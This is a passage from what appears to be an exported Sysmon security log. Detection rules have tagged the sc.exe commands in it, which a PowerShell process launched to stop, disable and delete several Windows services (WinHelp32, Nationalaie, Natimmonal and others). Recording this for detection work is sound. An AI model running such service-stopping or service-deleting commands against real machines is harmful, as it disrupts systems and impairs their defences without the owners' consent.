(WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.165",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:50:55.794 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001055002600} +ProcessId: 4436 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.796855700Z"",""eventRecordID"":""2903"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.794\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001055002600}\r\nProcessId: 4436\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.794"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001055002600}"",""processId"":""4436"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.975",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.740 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-00107efb2500} +ProcessId: 8008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.743011000Z"",""eventRecordID"":""2900"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.740\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-00107efb2500}\r\nProcessId: 8008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.740"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-00107efb2500}"",""processId"":""8008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.953",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.721 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9f92500} +ProcessId: 3524 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalaie Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalaie Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.727800200Z"",""eventRecordID"":""2899"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.721\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9f92500}\r\nProcessId: 3524\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalaie Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.721"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a9f92500}"",""processId"":""3524"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalaie Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.909",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.655 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4f72500} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.672286500Z"",""eventRecordID"":""2897"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.655\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4f72500}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:55.655"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d4f72500}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.795",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.591 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001024f52500} +ProcessId: 1996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.593613900Z"",""eventRecordID"":""2894"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.591\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001024f52500}\r\nProcessId: 1996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.591"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001024f52500}"",""processId"":""1996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.749",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.556 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001023f12500} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.559600400Z"",""eventRecordID"":""2892"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.556\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001023f12500}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.556"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001023f12500}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 